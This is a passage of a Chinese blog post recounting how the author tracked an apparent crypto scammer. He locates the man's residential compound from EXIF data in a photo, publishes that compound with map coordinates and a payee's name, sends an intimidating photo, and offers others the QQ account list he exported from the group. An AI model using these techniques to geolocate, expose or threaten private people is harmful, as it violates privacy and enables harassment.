flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">141</figcaption></figure><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>河东区新月花苑<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">不过介绍完U是啥玩儿之后，他还是心动了，毕竟这么多钱，谁顶得住啊</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.5579710144927537" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=ec00cd86&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn4XlSgqeqZqjKhF8qP7j7uMwia3yJvVd57IGFibhddNibZL7b0eqWDRtAA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">142</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">大哥用了个勾 8⃣️安卓手机，我嫌麻烦没给他准备安卓的端。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.9009661835748792" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=ac014219&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhncuxpIWIOuLiahMicAT1IWAdogFqVXG0GzcInCD5OOiciajGhnAgUGWuZDw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">143</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">大哥一边说不弄了，一边在拿他的iPhone搜，搜了个国内store的媒体类软件，</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="3.685990338164251" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=14dc1915&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnwSicl1Qg1U4z8ZCtibNqqJrw7PEubqy2MLwaP7J4Qoy1pRnz0wQyeKtw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">144</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">后面基本就聊不下去了</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.8864734299516908" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=87ce9758&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnicV2ePjpBPsQ6MO5W6eMtVf4b934Jry52Pg7yy2aVJOFm3HGhFvpSQw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">145</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">还寻思再迂回下呢，直接给我屏蔽了🐶登西</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6811594202898551" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=1399a1a9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn5iavuhBevfqHwD6a0Lkyj2AnTTPxgWPLZ93hP0TXrAU3zCG3z5VqAFw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">146</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我寻思就这么空军了？那roc说过日站得细，手里有啥你得盘一盘啊。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.27616747181964574" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=3b9d19de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnXPR6aWnQpFHCdzb4sfH5Y1wibDRS94OIJN7qPoY778BtjYicCz1b33hA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">147</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我一看他拍iPhone手机发的原图啊，该不会有EXIF吧。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.4428341384863124" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=e6410204&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnfesQUWCfTDnCOBticagV4K1PHiaGujnbr6X3FzMliaaCJ1ic8LZiag60OxQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">148</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">iPhone直接存到相册里的话是可以读出来这块信息的，而且我个人觉得定位比拿出来经纬度再拿其他地图定位要准一些。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.175" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=51ac966f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnia5Tsrh1VeCcnoXKyJgNdKUHjwrxSjelbzmoORws5TpvJ06WcrloTxQ%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">149</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.4046875" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=217c2574&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnAoA5ghRmHoZwJj5KIpEBOKbvqGC7IXjPia2Pfk8WbITk8dYJgO7Fib6w%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">150</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="2.164102564102564" data-s="300,640" style="" data-type="png" data-w="1170" src="https://wechat2rss.xlab.app/img-proxy/?k=61d64eb1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnlJT6jFKHfmKt4icgBRxDs8cpNIBkdVU51ExS4oBrMnvIAhk3UjU0lhw%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">151<br/></figcaption><section><mp-common-poi class="js_editor_mppoi appmsg_poi_iframe custom_select_card js_uneditable" data-pluginname="poi" data-id="0.4843829999929332" data-name="%E6%96%B0%E6%9C%88%E8%8A%B1%E8%8B%91" data-address="%E5%A4%A9%E6%B4%A5%E5%B8%82%E6%B2%B3%E4%B8%9C%E5%8C%BA%E4%B8%87%E4%B8%9C%E8%B7%AF%2C%E7%BA%A2%E9%A1%B6%E8%8A%B1%E5%9B%AD%E9%99%84%E8%BF%91" data-img="https%3A%2F%2Fmmbiz.qlogo.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnOw8czJwgmU3Hhrdy9YBdkZKln7Rx3dLDx1dxiacMGfXKBPSYx48Bicxg%2F0%3Fwx_fmt%3Dpng" data-longitude="117.267959595" data-latitude="39.138137817" data-poiid="1315694849026181998" data-province="%E5%A4%A9%E6%B4%A5" data-city="%E6%B2%B3%E4%B8%9C%E5%8C%BA" data-type="2" data-weui-theme="light"></mp-common-poi></section><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;"><br/></figcaption></figure><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>睡一觉缓缓<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">给我删了之后其实也没啥好聊的了，我再换剧本的话必然要花费精力和时间跟他制造更大的迂回剧本。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">这中间的时间我基本是在跟金牌黑客交流，也没顾得上他。突然有天有个相关部门的朋友在群里发了个言，我灵机一动找他帮我做了个图。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.278125" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=287b7240&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnV2c5l2C96EicF1QcEFWXj5Xibmf6TWj4zdVHD8DTkpc3dVw7Q9v3LBQA%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">152</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我在地图上搜到那栋楼的准确位置，并截图发给朋友，让他跟有震慑性质的标志物合个影。其实这种图P起来成本也不高，但是工地没有PS，只好麻烦别人了。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5907859078590786" data-s="300,640" style="" data-type="png" data-w="738" src="https://wechat2rss.xlab.app/img-proxy/?k=2bc11a9f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn4BUJbRfRFN1MSgP3yC3bpKPCicBbfc6eEjSRSRa8tVkT63DMKdEGuww%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">153</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">朋友没一会儿给我发回来一张图，效果比我想的都好。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.75078125" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=df680268&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnwRJUj4enXufqqIicib2asFicIryasLaEibfEA6RqAuicMRiaHqFicFVyNmySQ%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">154</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">拿到图片后我感觉自己腰里已经是别了一把枪了，闲着没事的时候我已经在构思以什么样的姿态、什么样的铺垫，<strong style="font-weight: bold;color: black;">扔出这颗震动新月花苑的深水炸弹</strong>。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7457264957264957" data-s="300,640" style="" data-type="gif" data-w="468" src="https://wechat2rss.xlab.app/img-proxy/?k=d509fc27&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnDe7nuoEUsbDNrV5lkibB90ibI9DSKRh3lt6Ku61CqNBsPLkG8kNZ9lQQ%2F640%3Fwx_fmt%3Dgif"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">155</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我又换了个号加过去，管理员很快就来私聊我了。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="2.2" data-s="300,640" style="" data-type="jpeg" data-w="1065" src="https://wechat2rss.xlab.app/img-proxy/?k=72086a92&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnEDYrjq7WnDxg2xYIk9fE8iakzAeHYNLy7xibiaVxJ3qhibOExTys9zGYXw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">156</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我直接问支付宝咋付款，天津小哥发来个不明所以的东西。我一看你这个很专业啊，还有小卖部给你洗钱？？？</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.9588400374181478" data-s="300,640" style="" data-type="jpeg" data-w="1069" src="https://wechat2rss.xlab.app/img-proxy/?k=f5a1a905&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnibCl8icRTFxmZaz1EOGCTsGt1qHt2Ff4kHCFdBTgHMbw6K5ib7xV4DgWg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">157</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">这孩子说话不知道是不是有点缺陷，喜欢只说一个字，不明所以整的很酷一样。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">一番纠葛，又特么换了个便利店。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="4.744781783681215" data-s="300,640" style="" data-type="jpeg" data-w="1054" src="https://wechat2rss.xlab.app/img-proxy/?k=f7126096&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnTmsYXucBE8XfG6L0dRzX66jRacIYKqWpjlgRX1tm1UgutauOR0VvtA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">158</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我转过去一分钱，看到对面叫顾云海，看这意思不像是他本人。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5359848484848485" data-s="300,640" style="" data-type="jpeg" data-w="1056" src="https://wechat2rss.xlab.app/img-proxy/?k=dff0c1fc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnaV87cicNaAY1Z6QaCUDnLFgZcdKmrCNCdv2wylIlXFic0hVyer12INlQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">159</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我前摇一下，准备摊牌了</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8484848484848485" data-s="300,640" style="" data-type="jpeg" data-w="1056" src="https://wechat2rss.xlab.app/img-proxy/?k=abd0e2e9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnbXkeQtfDSLqFH7cRfBHO5PaJvo3lLLr8Wl32R036wGlxeQib0nWNaEw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">160</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><strong style="font-weight: bold;color: black;">这王八犊子都不好奇，手是真快啊，话都没说完果断给我拉黑了艹</strong>，我的深水炸弹还没来得及往外扔呢。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5776515151515151" data-s="300,640" style="" data-type="jpeg" data-w="1056" src="https://wechat2rss.xlab.app/img-proxy/?k=2f4ab1ba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnGoSOxq4IMMSYCZLmTdgavj3M1ibWMsL9Y3qpEicvB9kFWUywL3SiaPLvg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">161</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我估计他不怕应该是不可能的，因为我没直接给准确的哪个小区哪个楼，避免定位有偏差，马路的覆盖面还是大一些的。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">怕立刻加群他察觉出来还是我，过了半个小时我又换了个号加群，但是一直没通过，等了一晚上，直到第二天。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>可能是真慌了<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">第二天早上我又像往常一样在通往工地的地铁上，昨天的加群申请通过了，但是没人来私聊我，只是群里有人发：需解请私聊。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3824476650563607" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=90e159fd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnMxbcB5KawJ5HF7Igc3mbeROiamyHa5drwvrT3oLdLda3AcibB7Cv15VQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">162</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我就主动联系了这个管理员，开门见山。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.9269870609981516" data-s="300,640" style="" data-type="jpeg" data-w="1082" src="https://wechat2rss.xlab.app/img-proxy/?k=16e4a6f1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnsoV94VICHmczIsbfRLuEs6vibJ1RdvYafqApuqhzoEuakRzfJPhGhDg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">163</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我不知道对面是什么样的表情，什么样的场景，<strong style="font-weight: bold;color: black;">我只知道这崽子👋是真快啊。</strong></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我刚发完图，发完第一段话，基本在发第二段话的同时，群就解散了，我也不能跟他私聊了，估计他看到我的消息后悔也来不及了。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">因为记得以前玩QQ的时候，群解散了之后还是可以恢复的，我观察了几天，群一直没有恢复，直到现在也是，估计小伙可能是真慌了。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.27616747181964574" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=d1bfe737&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnuAvkJ51r6GZOqFc8bnxAy7iaHRd3rBYUEqBlkpHpvMkRCiaawXlMNgxg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">164</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">中间有在我之后加群的，我尝试加了两个人的好友，提醒他们不要被骗，一个没有通过，一个在群解散后通过的。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">看空间内容，这人也不像是啥好东西，倒像是个狗推，我怀疑要么是跑路小哥本人，要么是回来探查情况的朋友，小概率是无关人员，就隐晦的吓唬吓唬她。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="5.339658444022771" data-s="300,640" style="" data-type="jpeg" data-w="1054" src="https://wechat2rss.xlab.app/img-proxy/?k=56c78c0c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhndpqXXFY3TWwIDOlDClfAqAyXXtNW4awtCxMElePibsBgfN4ibibe7gbvA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">165</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">为了避免天津快手哥明白过来咋回事，我刻意拿手机地图先搜索好位置定位后再截图，而不是直接截图exif的信息。估计看到这篇文章之前，快手哥想破头也整不明白位置是咋泄漏的。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">其次我早就想到他可能会解散群聊，所以已经提前把整个群的所有QQ号导了一份，他这个一百多个小号的群真不知道哪儿来的，里面可能也包含其他受害者，根据加群时间应该可以分辨出来，如果有啊sir或者其他朋友感兴趣的话可以公众号私信找我要。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>结语与复盘</h2><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: decimal;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">还是那句话，欲望抬头的时候，我们的眼睛就被蒙住，只能看到自己想看到的了。</p></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">子公司业务时不时收到阿三白帽一发一word的垃圾洞，像没有抹除EXIF信息这种他们也发，记得很久很久之前微信原图还没抹这个东西，QQ到现在还没抹也真是我没想到的。</p></section><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="text-align: center;"><br/></p></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">真的好人还是有的，有两个老哥可能是看到我关注了金牌黑客，过来私聊我别相信他。我表示感谢，并且装了个B哈哈哈哈。</p><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7592592592592593" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=20c8cba0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnPI5nzjIV56GqcJS9ia83fPFpdw2ug2rWggPrXDlXSzxYtd57d3lC6Rw%2F640%3Fwx_fmt%3Djpeg"/>169</figcaption></figure><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;"><img class="rich_pages wxw-img js_insertlocalimg" 